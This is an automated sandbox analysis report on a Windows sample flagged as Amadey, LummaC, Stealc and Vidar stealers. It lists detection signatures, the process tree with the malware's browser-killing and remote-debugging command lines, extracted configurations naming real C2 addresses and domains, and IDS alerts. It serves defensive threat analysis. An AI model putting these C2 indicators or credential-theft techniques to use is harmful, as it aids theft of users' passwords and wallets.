Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1548636
MD5:	4316e6bfa31a0f5639ab60ad32c2f672
SHA1:	cc0a14bd5b282fa1963c11fb3a0cbf576f463357
SHA256:	28c789c3953a7383ef6d9876e2aaf5bb91393b0be4b8c8919845a2428920e751
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Modifies windows update settings

Monitors registry run keys for changes

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4316E6BFA31A0F5639AB60AD32C2F672)

skotes.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 4316E6BFA31A0F5639AB60AD32C2F672)

skotes.exe (PID: 2576 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 4316E6BFA31A0F5639AB60AD32C2F672)

skotes.exe (PID: 7576 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 4316E6BFA31A0F5639AB60AD32C2F672)

pisos23.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe" MD5: D1629F3C794978E4A261000D117014DC)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pisos23.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe" MD5: D1629F3C794978E4A261000D117014DC)

WerFault.exe (PID: 8160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7796 -s 264 MD5: C31336C1EFC2CCB44B4326EA793040F2)

3e169c0a7e.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe" MD5: 00280DC5049562D147E25FE7E545007C)

7fb3e2a1d2.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe" MD5: C31A9B8F636DD5219331381E6120A997)

chrome.exe (PID: 5388 cmdline: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2344,i,6944280145687468448,6337840555587175668,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 8476 cmdline: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8860 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2660,i,4893309152758529203,13133286740846898616,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

da069a4b00.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe" MD5: 40AD6330DCB8BBFDE0F879223B84D0E0)

taskkill.exe (PID: 6200 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2836 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6388 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5624 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6256 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 7456 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

fe40c3a9a8.exe (PID: 2964 cmdline: "C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe" MD5: 178EC03D4F5F0C710E24F5F463993FE5)

3e169c0a7e.exe (PID: 1120 cmdline: "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe" MD5: 00280DC5049562D147E25FE7E545007C)

firefox.exe (PID: 7108 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3276 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5000 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20230927232528 -prefsHandle 2116 -prefMapHandle 2100 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8757b89c-e953-4ab1-960f-4c48d4b5d735} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b625d6df10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 6568 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -parentBuildID 20230927232528 -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b74bb88-0790-41f2-9d81-5248e5eb58ba} 3276 "\\.\pipe\gecko-crash-server-pipe.3276" 1b638209e10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

7fb3e2a1d2.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe" MD5: C31A9B8F636DD5219331381E6120A997)

da069a4b00.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe" MD5: 40AD6330DCB8BBFDE0F879223B84D0E0)

taskkill.exe (PID: 8300 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 8832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9184 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2824 --field-trial-handle=2076,i,3800076312962857539,4475748106252003537,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

3e169c0a7e.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe" MD5: 00280DC5049562D147E25FE7E545007C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: LummaC

{"C2 url": ["plaintifuf.site", "terracedjz.cyou", "unityshootsz.site", "honerstyzu.site", "monopuncdz.site", "uppermixturyz.site", "reinfomarbke.site", "moeventmynz.site", "bringlanejk.site"], "Build id": "FATE99--test"}

Threatname: Vidar

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000A.00000003.2960102446.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3040960830.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.3077740668.00000000016CF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
0000000E.00000002.3540303643.0000000000B11000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002E.00000003.3563789245.0000000001199000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000003.3128818775.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3122949469.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002E.00000003.3401961515.0000000001195000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2961051279.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3125220663.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2924857239.0000000003498000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3106303828.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3120888829.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2960979403.00000000051A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.2957615256.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2961848227.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000021.00000003.3110291684.0000000004C20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000003.2980997521.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3055337116.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3102256253.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2943421605.0000000003498000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3112345519.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3110627341.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2890126732.0000000000D96000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2245012498.0000000000B21000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.3133983224.00000000013FB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2988852728.00000000034A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2979610284.0000000003499000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2976118419.0000000003499000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3420827049.00000000087E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000003.2959742429.0000000003498000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000003.3404778297.0000000001195000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2926225223.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2959907784.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2912786822.0000000000D96000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2941976791.0000000003498000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3127009361.00000000013F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2988528325.000000000349B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.3074568710.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000003.3562637684.0000000001198000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2980648761.0000000003499000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 7892	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 7892	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 7892	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: pisos23.exe PID: 8072	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: pisos23.exe PID: 8072	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pisos23.exe PID: 8072	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 7fb3e2a1d2.exe PID: 2472	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 7fb3e2a1d2.exe PID: 2472	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 7fb3e2a1d2.exe PID: 2472	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 7fb3e2a1d2.exe PID: 2472	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 1120	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 1120	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 1120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 1120	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 3e169c0a7e.exe PID: 1120	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: da069a4b00.exe PID: 5844	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.7fb3e2a1d2.exe.b10000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.skotes.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.8c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3e169c0a7e.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe, ParentProcessId: 2472, ParentProcessName: 7fb3e2a1d2.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 5388, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3e169c0a7e.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:31:30.367177+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49758	TCP
2024-11-04T17:32:08.603031+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49948	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.867133+0100	2028371	3	Unknown Traffic	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:25.323777+0100	2028371	3	Unknown Traffic	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:26.316261+0100	2028371	3	Unknown Traffic	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:27.863212+0100	2028371	3	Unknown Traffic	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:28.303599+0100	2028371	3	Unknown Traffic	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:29.353174+0100	2028371	3	Unknown Traffic	192.168.2.5	50007	104.21.5.155	443	TCP
2024-11-04T17:32:30.424302+0100	2028371	3	Unknown Traffic	192.168.2.5	50009	188.114.97.3	443	TCP
2024-11-04T17:32:31.135331+0100	2028371	3	Unknown Traffic	192.168.2.5	50011	104.21.5.155	443	TCP
2024-11-04T17:32:32.372228+0100	2028371	3	Unknown Traffic	192.168.2.5	50012	188.114.97.3	443	TCP
2024-11-04T17:32:33.488349+0100	2028371	3	Unknown Traffic	192.168.2.5	50013	104.21.5.155	443	TCP
2024-11-04T17:32:33.865384+0100	2028371	3	Unknown Traffic	192.168.2.5	50015	188.114.97.3	443	TCP
